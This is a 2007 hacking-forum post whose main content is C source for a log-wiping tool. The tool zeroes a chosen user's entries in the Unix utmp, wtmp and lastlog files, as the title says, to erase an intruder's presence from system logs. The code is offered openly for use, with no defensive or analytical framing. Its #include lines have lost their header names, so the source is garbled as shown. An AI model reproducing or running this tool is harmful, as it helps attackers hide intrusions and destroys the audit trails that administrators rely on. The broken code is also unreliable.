Username: Save?
Password:
Home Forum Links Search Login Register*
    News: Welcome to the TechnoWorldInc! Community!
Recent Updates
[August 11, 2025, 02:03:44 PM]

[August 11, 2025, 02:03:44 PM]

[August 11, 2025, 02:03:44 PM]

[August 11, 2025, 02:03:44 PM]

[May 13, 2025, 02:04:25 PM]

[May 13, 2025, 02:04:25 PM]

[May 13, 2025, 02:04:25 PM]

[April 12, 2025, 01:54:20 PM]

[April 12, 2025, 01:54:20 PM]

[April 12, 2025, 01:54:20 PM]

[April 12, 2025, 01:54:20 PM]

[March 12, 2025, 03:05:30 PM]

[March 12, 2025, 03:05:30 PM]
Subscriptions
Get Latest Tech Updates For Free!
Resources
   Travelikers
   Funistan
   PrettyGalz
   Techlap
   FreeThemes
   Videsta
   Glamistan
   BachatMela
   GlamGalz
   Techzug
   Vidsage
   Funzug
   WorldHostInc
   Funfani
   FilmyMama
   Uploaded.Tech
   Netens
   Funotic
   FreeJobsInc
   FilesPark
Participate in the fastest growing Technical Encyclopedia! This website is 100% Free. Please register or login using the login box above if you have already registered. You will need to be logged in to reply, make new topics and to access all the areas. Registration is free! Click Here To Register.
+ Techno World Inc - The Best Technical Encyclopedia Online! » Forum » THE TECHNO CLUB [ TECHNOWORLDINC.COM ] » Ethical Hacking / Security / Viruses
 Erasing_Your_Presence_From_System_Logs
Pages: [1]   Go Down
  Print  
Author Topic: Erasing_Your_Presence_From_System_Logs  (Read 1478 times)
Mark David
Administrator
Super Elite Member
*****



Karma: 185
Offline Offline

Posts: 1624

!!!Techno King!!!

fabulous_designer
View Profile WWW
Erasing_Your_Presence_From_System_Logs
« Posted: February 27, 2007, 08:50:33 PM »


                                      ?? Erasing Your Presence From System Logs ??



Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose.



Example:



#include

#include

#include

#include

#include

#include

#include

#include

#define WTMP_NAME "/usr/adm/wtmp"

#define UTMP_NAME "/etc/utmp"

#define LASTLOG_NAME "/usr/adm/lastlog"



int f;



void kill_utmp(who)

char *who;

{

    struct utmp utmp_ent;



  if ((f=open(UTMP_NAME,O_RDWR))>=0) {

        while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )

          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

                          bzero((char *)&utmp_ent,sizeof( utmp_ent ));

                          lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);

                          write (f, &utmp_ent, sizeof (utmp_ent));

                  }

        close(f);

  }

}



void kill_wtmp(who)

char *who;

{

    struct utmp utmp_ent;

    long pos;



    pos = 1L;

    if ((f=open(WTMP_NAME,O_RDWR))>=0) {



        while(pos != -1L) {

           lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);

           if (read (f, &utmp_ent, sizeof (struct utmp))<0) {

                pos = -1L;

           } else {

                if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

                        bzero((char *)&utmp_ent,sizeof(struct utmp ));

                        lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);

                        write (f, &utmp_ent, sizeof (utmp_ent));

                        pos = -1L;

                } else pos += 1L;

           }

        }

        close(f);

  }

}



void kill_lastlog(who)

char *who;

{

    struct passwd *pwd;

    struct lastlog newll;



        if ((pwd=getpwnam(who))!=NULL) {



           if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {

                  lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);

                  bzero((char *)&newll,sizeof( newll ));

                  write(f, (char *)&newll, sizeof( newll ));

                  close(f);

           }



    } else printf("%s: ?\n",who);

}



main(argc,argv)

int argc;

char *argv[];

{

    if (argc==2) {

           kill_lastlog(argv[1]);

           kill_wtmp(argv[1]);

           kill_utmp(argv[1]);

           printf("Zap2!\n");

    } else

    printf("Error.\n");

}

Logged

Pages: [1]   Go Up
  Print  
 
Jump to:  

Copyright © 2006-2023 TechnoWorldInc.com. All Rights Reserved. Privacy Policy | Disclaimer
Page created in 0.111 seconds with 23 queries.